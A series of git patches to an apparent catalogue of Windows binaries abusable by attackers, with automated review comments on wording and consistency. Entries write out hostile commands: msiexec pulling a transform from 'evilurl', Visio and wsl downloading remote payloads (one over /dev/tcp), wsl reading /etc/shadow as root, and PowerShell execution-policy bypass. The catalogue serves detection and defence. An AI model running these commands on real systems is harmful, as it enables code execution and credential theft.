From 5d7ec48f4f86c1430a26292471efc4505e553abf Mon Sep 17 00:00:00 2001 From: Lino <123986259+L1-0@users.noreply.github.com> Date: Mon, 20 May 2024 22:49:27 +0200 Subject: [PATCH 1/8] Update Msiexec.yml (#377) Fixed spelling --- yml/OSBinaries/Msiexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 2e69f24..8eab24c 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -37,12 +37,12 @@ Commands: Tags: - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. - Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server + Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. + Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe From 91a3e80d8fad6f298c52429bafd13c562c10c971 Mon Sep 17 00:00:00 2001 From: Mozhar Alhosni Date: Thu, 23 May 2024 01:55:40 +0800 Subject: [PATCH 2/8] Update Csc.yml (#376) Co-authored-by: Wietze --- yml/OSBinaries/Csc.yml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) 
diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 945b584..6b8517c 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,18 +1,18 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET Framework to compile C# code Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + - Command: csc.exe -out:Output.exe File.cs + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -30,7 +30,4 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe -Acknowledgement: - - Person: - Handle: + - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/ From 2185ade1f2f70750bbb1b1bc2754b954ac26f44c Mon Sep 17 00:00:00 2001 
From: Borja Date: Wed, 22 May 2024 19:59:51 +0200 Subject: [PATCH 3/8] Update Msiexec.yml (#369) --- yml/OSBinaries/Msiexec.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 8eab24c..35a97e4 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" - Description: Calls DLLRegisterServer to register the target DLL. + Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -28,7 +28,7 @@ Commands: Tags: - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" - Description: Calls DLLUnregisterServer to un-register the target DLL. + Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User From 78fa7b550e1ec045c8ed2b4920f5c1d9a20cbc00 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 23 May 2024 02:02:56 +0300 Subject: [PATCH 4/8] Add Winfile.yml (#374) Co-authored-by: Wietze --- yml/OtherMSBinaries/winfile.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 yml/OtherMSBinaries/winfile.yml diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml new file mode 100644 index 0000000..f0171ed --- /dev/null +++ b/yml/OtherMSBinaries/winfile.yml 
@@ -0,0 +1,24 @@ +--- +Name: winfile.exe +Description: Windows File Manager executable +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: winfile.exe calc.exe + Description: Execute an executable file with WinFile as a parent process. + Usecase: Performs execution of specified file, can be used as a defense evasion + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\winfile.exe + - Path: C:\Windows\winfile.exe + - Path: C:\Program Files\WinFile\winfile.exe + - Path: C:\Program Files (x86)\WinFile\winfile.exe + - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe +Resources: + - Link: https://github.com/microsoft/winfile +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' From 5d80e48159fce46992f0e45b471df1de990885d6 Mon Sep 17 00:00:00 2001 From: "Dr. Gerald Yaya" Date: Mon, 3 Jun 2024 17:52:55 +0100 Subject: [PATCH 5/8] Correct Winget.yml Spelling (#379) Corrected some spelling mistakes in the "Privileges" node of Winget.yml --- yml/OSBinaries/Winget.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index cd2588d..d2629de 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -8,7 +8,7 @@ Commands: Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' Usecase: Download and execute an arbitrary file from the internet Category: Execute - Privileges: Local Aministrator - required to enabled local manifest setting + Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: From 622aaeed54dd596a763473fe3515aab4e95f1f40 Mon Sep 17 00:00:00 2001 
From: bohops Date: Wed, 5 Jun 2024 18:17:34 -0400 Subject: [PATCH 6/8] Add Powershell.exe to Honorable Mentions (#363) --- yml/HonorableMentions/PowerShell.yml | 38 ++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 yml/HonorableMentions/PowerShell.yml diff --git a/yml/HonorableMentions/PowerShell.yml b/yml/HonorableMentions/PowerShell.yml new file mode 100644 index 0000000..dfc3048 --- /dev/null +++ b/yml/HonorableMentions/PowerShell.yml 
@@ -0,0 +1,38 @@ +--- +Name: Powershell.exe +Description: Powershell.exe is a a task-based command-line shell built on .NET. +Author: 'Everyone' +Created: 2024-04-03 +Commands: + - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 + Description: Set the execution policy to bypass and execute a PowerShell script without warning + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." + Description: Set the execution policy to bypass and execute a PowerShell command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== + Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up +Full_Path: + - Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe' + - Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell +Resources: + - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 + - Link: https://attack.mitre.org/techniques/T1059/001/ +Acknowledgement: + - Person: Everyone + Handle: '@alltheoffensivecyberers' From 35148cc39eec3f250b765e2402d62f8a85f3279f Mon Sep 17 00:00:00 2001 
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 6 Jun 2024 01:50:25 +0300 Subject: [PATCH 7/8] Add Visio.exe as a downloader (#356) Co-authored-by: Wietze --- yml/OtherMSBinaries/Visio.yml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Visio.yml diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml new file mode 100644 index 0000000..2c141e5 --- /dev/null +++ b/yml/OtherMSBinaries/Visio.yml @@ -0,0 +1,34 @@ +--- +Name: Visio.exe +Description: Microsoft Visio Executable +Author: Avihay Eldad +Created: 2024-02-15 +Commands: + - Command: Visio.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe +Detection: + - IOC: URL on a visio.exe command line + - IOC: visio.exe making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' 
From 03b527b10539dacc793624210cbc2272f135b4ea Mon Sep 17 00:00:00 2001 From: unrooted Date: Fri, 7 Jun 2024 00:42:25 +0200 Subject: [PATCH 8/8] Update wsl.exe description (#378) Co-authored-by: Wietze --- yml/OtherMSBinaries/Wsl.yml | 22 ++++++++-------------- 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1a5bda..e1493d1 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml 
@@ -10,35 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --exec bash -c 'cat file' - Description: Cats /etc/shadow file as root + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + - Command: wsl.exe --exec bash -c "" + Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --system calc.exe - Description: Execute the command as root - Usecase: Performs execution of arbitrary Linux commands as root without need for password. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 11 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + MitreID: T1105 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -59,3 +52,4 @@ Acknowledgement: Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' + - Person: Konrad 'unrooted' Klawikowski
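Review bot: the reworded Description line in the Msiexec.yml hunk at `@@ -37,12 +37,12 @@` (PATCH 1/8) still carries two grammar slips, "Additional to the file a transformation file will be used, which can contains malicious code"; suggest "In addition to the .MSI, a transformation file is applied, which can contain malicious code or binaries." The capitalisation fix to `Windows Vista` on the OperatingSystem line is good, but the identical lowercase `Windows vista` entry higher in the same file (visible as context at `@@ -19,7 +19,7 @@` in PATCH 3/8) is left as is, so the file ends up inconsistent.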
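Review bot: in the Csc.yml hunk at `@@ -1,18 +1,18 @@` (PATCH 2/8) the unchanged context lines keep `OperatingSystem: Windows vista, ...` and `Bypass defensive counter measures.`; since the neighbouring Description lines are already being rewritten, this is the natural place to correct the casing to `Windows Vista` and the spelling to `countermeasures`. The second hunk at `@@ -30,7 +30,4 @@` silently drops an empty `Acknowledgement:` stub (`Person:` / `Handle:` with no values) alongside the docs.microsoft.com to learn.microsoft.com link swap; the removal is reasonable but deserves a mention in the commit message.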
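Review bot: the casing change to `DllRegisterServer` / `DllUnregisterServer` in the two Msiexec.yml hunks of PATCH 3/8 matches the exported function names and is correct; while touching this region, the context line `OperatingSystem: Windows vista, Windows 7, ...` at `@@ -19,7 +19,7 @@` should get the same `Windows Vista` fix that PATCH 1/8 applied further down the file.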
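Review bot: the new file in PATCH 4/8 is created as `yml/OtherMSBinaries/winfile.yml` (lowercase) while every other file in the series is capitalised (`Msiexec.yml`, `Csc.yml`, `Visio.yml`, `Wsl.yml`) and the commit subject itself says `Winfile.yml`; rename for consistency. The entry also has no `Detection:` section, unlike Csc.yml, PowerShell.yml, Visio.yml and Wsl.yml, and a single `IOC:` line (for example winfile.exe spawning an unexpected child process) would match the sibling entries. Finally, the two `C:\Windows\...` paths sit next to a `C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_...` path and a GitHub resource link, so it is worth confirming that winfile.exe is really present under `C:\Windows\System32` and `C:\Windows` on the listed `Windows 10, Windows 11` rather than only through the Store package or the GitHub build.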
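Review bot: `Description: Powershell.exe is a a task-based command-line shell built on .NET.` in the PowerShell.yml hunk (PATCH 6/8) has a doubled "a", and `Name: Powershell.exe` uses a capital P while the `Command` and `Full_Path` lines use `powershell.exe`. `OperatingSystem: Windows 7 and up` departs from the explicit version lists used by the other entries in this series, and the `Full_Path` entries use `%SystemRoot%` where the rest of the series writes literal `C:\Windows\...`. The `-ec` sample in the third command decodes to the UTF-16LE string `"We <3 LOLBAS"`; given the Description calls it "very malicious", a short note that the sample is a harmless placeholder would stop readers copying it as an IOC. The `Sigma:` link also points at a rules directory rather than a specific rule file, unlike the Elastic link in Csc.yml.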
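Review bot: in the Visio.yml hunk (PATCH 7/8) `Description: Downloads payload from remote server` and `Usecase: It will download a remote payload and place it in INetCache.` read swapped against the convention used elsewhere in the series, where Description states concretely what the command does and Usecase states the goal (compare Wsl.yml: `Description: Downloads file from 192.168.1.10` / `Usecase: Download file`); suggest moving the INetCache detail into Description and shortening Usecase. `OperatingSystem: Windows` is also vaguer than the version lists in the other entries, and the entry has no `Resources:` section.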
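Review bot: the replacement third command in the Wsl.yml hunk at `@@ -10,35 +10,28 @@` (PATCH 8/8), `wsl.exe --exec bash -c ""`, has an empty command string, and its Description refers to `-u ` and `-d ` with nothing after either flag; if angle-bracket placeholders were intended they have been lost (the `Co-authored-by: Wietze` trailer has likewise lost its bracketed address, so this may be an extraction artefact), but as rendered the entry is not self-explanatory. The commit subject says "Update wsl.exe description", yet the same hunk also deletes the whole `wsl.exe --system calc.exe` entry (Windows 11, "Execute the command as root") without saying why; either keep it or explain the removal in the message. The final hunk at `@@ -59,3 +52,4 @@` adds `- Person: Konrad 'unrooted' Klawikowski` with no matching `Handle:` line, unlike the two preceding acknowledgements. The MitreID change from T1202 to T1105 on the `/dev/tcp` download command is the right correction.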